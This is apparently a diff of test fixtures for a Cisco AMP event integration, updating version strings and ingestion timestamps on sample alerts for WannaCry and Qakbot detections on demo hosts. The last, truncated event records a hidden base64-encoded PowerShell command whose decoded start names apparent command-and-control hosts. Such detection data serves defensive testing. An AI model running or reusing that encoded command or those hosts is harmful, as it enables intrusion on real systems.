                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419264043361501000,\"timestamp\":1610643347,\"timestamp_nanoseconds\":872000000,\"date\":\"2021-01-14T16:55:47+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.Ransom:Gen.20gl.1201\",\"detection_id\":\"6419264043361501261\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"@WanaDecryptor@.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\@WanaDecryptor@.exe\",\"identity\":{\"sha256\":\"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25\",\"sha1\":\"45356a9dd616ed7161a3b9192e2f318d0ab5ad10\",\"md5\":\"7bf2b57f2a205768755c07f238fb32cc\"}}}}",
                 "kind": "alert",
                 "action": "Retrospective Detection",
@@ -1402,7 +1402,7 @@
                 }
             },
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "hosts": [
@@ -1426,7 +1426,7 @@
             },
             "event": {
                 "severity": 3,
-                "ingested": "2021-09-12T17:31:54.500162155Z",
+                "ingested": "2021-09-13T18:07:28.111168956Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419264043361501000,\"timestamp\":1610643347,\"timestamp_nanoseconds\":763000000,\"date\":\"2021-01-14T16:55:47+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.Ransom:Gen.20gl.1201\",\"detection_id\":\"6419229331435814969\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"u.wnry\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\u.wnry\",\"identity\":{\"sha256\":\"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25\"}}}}",
                 "kind": "alert",
                 "action": "Retrospective Detection",
@@ -1481,7 +1481,7 @@
                 }
             },
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "hosts": [
@@ -1505,7 +1505,7 @@
             },
             "event": {
                 "severity": 3,
-                "ingested": "2021-09-12T17:31:54.500164235Z",
+                "ingested": "2021-09-13T18:07:28.111171040Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419264043361501000,\"timestamp\":1610643347,\"timestamp_nanoseconds\":716000000,\"date\":\"2021-01-14T16:55:47+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.Ransom:Gen.20gl.1201\",\"detection_id\":\"6419204905956802579\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"u.wnry\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\u.wnry\",\"identity\":{\"sha256\":\"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25\"}}}}",
                 "kind": "alert",
                 "action": "Retrospective Detection",
@@ -1558,7 +1558,7 @@
                 }
             },
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "hosts": [
@@ -1578,7 +1578,7 @@
             },
             "event": {
                 "severity": 3,
-                "ingested": "2021-09-12T17:31:54.500166300Z",
+                "ingested": "2021-09-13T18:07:28.111173128Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419264039066534000,\"timestamp\":1610643346,\"timestamp_nanoseconds\":718000000,\"date\":\"2021-01-14T16:55:46+00:00\",\"event_type\":\"Retrospective Quarantine Attempt Failed\",\"event_type_id\":2164260893,\"detection_id\":\"6419229322845880359\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"error\":{\"error_code\":3221225761,\"description\":\"Cannot delete\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}",
                 "kind": "alert",
                 "action": "Retrospective Quarantine Attempt Failed",
@@ -1633,7 +1633,7 @@
                 }
             },
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "hosts": [
@@ -1653,7 +1653,7 @@
             },
             "event": {
                 "severity": 3,
-                "ingested": "2021-09-12T17:31:54.500168364Z",
+                "ingested": "2021-09-13T18:07:28.111175203Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419264039066534000,\"timestamp\":1610643346,\"timestamp_nanoseconds\":765000000,\"date\":\"2021-01-14T16:55:46+00:00\",\"event_type\":\"Retrospective Quarantine\",\"event_type_id\":553648155,\"detection_id\":\"6419264039066533964\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}",
                 "kind": "alert",
                 "action": "Retrospective Quarantine",
@@ -1708,7 +1708,7 @@
                 }
             },
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "hosts": [
@@ -1734,7 +1734,7 @@
             },
             "event": {
                 "severity": 3,
-                "ingested": "2021-09-12T17:31:54.500170457Z",
+                "ingested": "2021-09-13T18:07:28.111177282Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419264039066534000,\"timestamp\":1610643346,\"timestamp_nanoseconds\":749000000,\"date\":\"2021-01-14T16:55:46+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.Gen.20gl.1201\",\"detection_id\":\"6419264039066533964\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Windows\\\\mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\",\"sha1\":\"61b9ae415fbe95bf4e6c616ce433cd20dce7dfe3\",\"md5\":\"54a116ff80df6e6031059fc3036464df\"}}}}",
                 "kind": "alert",
                 "action": "Retrospective Detection",
@@ -1791,7 +1791,7 @@
                 }
             },
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "hosts": [
@@ -1817,7 +1817,7 @@
             },
             "event": {
                 "severity": 3,
-                "ingested": "2021-09-12T17:31:54.500172540Z",
+                "ingested": "2021-09-13T18:07:28.111179351Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419264039066534000,\"timestamp\":1610643346,\"timestamp_nanoseconds\":702000000,\"date\":\"2021-01-14T16:55:46+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.Gen.20gl.1201\",\"detection_id\":\"6419229322845880359\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Windows\\\\mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\",\"sha1\":\"61b9ae415fbe95bf4e6c616ce433cd20dce7dfe3\",\"md5\":\"54a116ff80df6e6031059fc3036464df\"}}}}",
                 "kind": "alert",
                 "action": "Retrospective Detection",
@@ -1870,7 +1870,7 @@
                 }
             },
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "hosts": [
@@ -1890,7 +1890,7 @@
             },
             "event": {
                 "severity": 3,
-                "ingested": "2021-09-12T17:31:54.500174721Z",
+                "ingested": "2021-09-13T18:07:28.111181571Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412622782676337000,\"timestamp\":1610642101,\"timestamp_nanoseconds\":729000000,\"date\":\"2021-01-14T16:35:01+00:00\",\"event_type\":\"Retrospective Quarantine Attempt Failed\",\"event_type_id\":2164260893,\"detection_id\":\"6412622782676336648\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446\"}}}}",
                 "kind": "alert",
                 "action": "Retrospective Quarantine Attempt Failed",
@@ -1945,7 +1945,7 @@
                 }
             },
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "hosts": [
@@ -1965,7 +1965,7 @@
             },
             "event": {
                 "severity": 3,
-                "ingested": "2021-09-12T17:31:54.500176777Z",
+                "ingested": "2021-09-13T18:07:28.111183666Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412622782676337000,\"timestamp\":1610642101,\"timestamp_nanoseconds\":729000000,\"date\":\"2021-01-14T16:35:01+00:00\",\"event_type\":\"Retrospective Quarantine Attempt Failed\",\"event_type_id\":2164260893,\"detection_id\":\"6412622782676336647\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446\"}}}}",
                 "kind": "alert",
                 "action": "Retrospective Quarantine Attempt Failed",
@@ -2020,7 +2020,7 @@
                 }
             },
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "hosts": [
@@ -2040,7 +2040,7 @@
             },
             "event": {
                 "severity": 3,
-                "ingested": "2021-09-12T17:31:54.500178843Z",
+                "ingested": "2021-09-13T18:07:28.111185734Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412622782676337000,\"timestamp\":1610642101,\"timestamp_nanoseconds\":713000000,\"date\":\"2021-01-14T16:35:01+00:00\",\"event_type\":\"Retrospective Quarantine Attempt Failed\",\"event_type_id\":2164260893,\"detection_id\":\"6412622782676336646\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446\"}}}}",
                 "kind": "alert",
                 "action": "Retrospective Quarantine Attempt Failed",
@@ -2097,7 +2097,7 @@
                 }
             },
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "hosts": [
@@ -2121,7 +2121,7 @@
             },
             "event": {
                 "severity": 3,
-                "ingested": "2021-09-12T17:31:54.500180907Z",
+                "ingested": "2021-09-13T18:07:28.111187851Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412622782676337000,\"timestamp\":1610642101,\"timestamp_nanoseconds\":198000000,\"date\":\"2021-01-14T16:35:01+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.D177E09A9A-95.SBX.TG\",\"detection_id\":\"6412622782676336647\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"kepv86368.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\AppData\\\\Local\\\\Temp\\\\kepv86368.exe\",\"identity\":{\"sha256\":\"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446\"}}}}",
                 "kind": "alert",
                 "action": "Retrospective Detection",
@@ -2176,7 +2176,7 @@
                 }
             },
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "hosts": [
@@ -2200,7 +2200,7 @@
             },
             "event": {
                 "severity": 3,
-                "ingested": "2021-09-12T17:31:54.500182993Z",
+                "ingested": "2021-09-13T18:07:28.111189928Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412622782676337000,\"timestamp\":1610642101,\"timestamp_nanoseconds\":198000000,\"date\":\"2021-01-14T16:35:01+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.D177E09A9A-95.SBX.TG\",\"detection_id\":\"6412622782676336646\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"uqlq0o884.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\AppData\\\\Local\\\\Temp\\\\uqlq0o884.exe\",\"identity\":{\"sha256\":\"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446\"}}}}",
                 "kind": "alert",
                 "action": "Retrospective Detection",
@@ -2257,7 +2257,7 @@
                 }
             },
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "hosts": [
@@ -2283,7 +2283,7 @@
             },
             "event": {
                 "severity": 3,
-                "ingested": "2021-09-12T17:31:54.500185061Z",
+                "ingested": "2021-09-13T18:07:28.111192015Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412622782676337000,\"timestamp\":1610642101,\"timestamp_nanoseconds\":198000000,\"date\":\"2021-01-14T16:35:01+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.D177E09A9A-95.SBX.TG\",\"detection_id\":\"6412622782676336645\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"120C.tmp\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\AppData\\\\Local\\\\Temp\\\\120C.tmp\",\"identity\":{\"sha256\":\"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446\",\"sha1\":\"f5a171c879b90e77861daf19741b373646d791ff\",\"md5\":\"32c9e6737dbdcbfb7563a3f27e2b1571\"}}}}",
                 "kind": "alert",
                 "action": "Retrospective Detection",
@@ -2340,7 +2340,7 @@
                 }
             },
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "hosts": [
@@ -2366,7 +2366,7 @@
             },
             "event": {
                 "severity": 3,
-                "ingested": "2021-09-12T17:31:54.500187130Z",
+                "ingested": "2021-09-13T18:07:28.111194086Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412622782676337000,\"timestamp\":1610642101,\"timestamp_nanoseconds\":183000000,\"date\":\"2021-01-14T16:35:01+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.D177E09A9A-95.SBX.TG\",\"detection_id\":\"6412622782676336644\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"QuotaGroup.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\AppData\\\\Local\\\\QuotaGroup\\\\QuotaGroup.exe\",\"identity\":{\"sha256\":\"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446\",\"sha1\":\"92673dd0e5f4a094fa6cd57bb301f884f2289f6c\",\"md5\":\"2f99e3456dc1d26f77c52b2119fde92f\"}}}}",
                 "kind": "alert",
                 "action": "Retrospective Detection",
@@ -2414,7 +2414,7 @@
         {
             "@timestamp": "2021-01-14T16:14:44.000Z",
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "hosts": [
@@ -2432,7 +2432,7 @@
             "event": {
                 "severity": 2,
                 "action": "Threat Detection",
-                "ingested": "2021-09-12T17:31:54.500189198Z",
+                "ingested": "2021-09-13T18:07:28.111196171Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6880683125978957000,\"timestamp\":1610640884,\"timestamp_nanoseconds\":810000000,\"date\":\"2021-01-14T16:14:44+00:00\",\"event_type\":\"Threat Detection\",\"event_type_id\":553648222,\"detection\":\"WMIPRVSE Launched Encoded Powershell Command\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_BP_WMIPRVSE\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"be:b0:d5:89:e2:96\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"bp_data\":{\"audit\":false,\"details\":{\"actions\":[{\"action\":\"end_process\",\"end_ts\":1602033881808,\"params\":[\"10724\"],\"start_ts\":1602033881805,\"status\":\"success\"}],\"eng_epoch\":1,\"eng_ver\":\"0.9.0.104\",\"matched_activity\":{\"events\":[{\"process:start\":{\"app\":\"powershell.exe\",\"app_path\":\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\",\"args\":[\"powershell.exe\",\"-NoP\",\"-NonI\",\"-W\",\"Hidden\",\"-E\",\"JABzAGUAPQBAACgAJwB1AHAAZABhAHQAZQAuAHcAaQBuAGQAbwB3AHMAZABlAGYAZQBuAGQAZQByAGgAbwBzAHQALgBjAGwAdQBiACcALAAnAGkAbgBmAG8ALgB3AGkAbgBkAG8AdwBzAGQAZQBmAGUAbgBkAGUAcgBoAG8AcwB0AC4AYwBsAHUAYgAnACwAJwA4ADcALgAxADIAMQAuADkAOAAuADIAMQA1ACcAKQANAAoAJABuA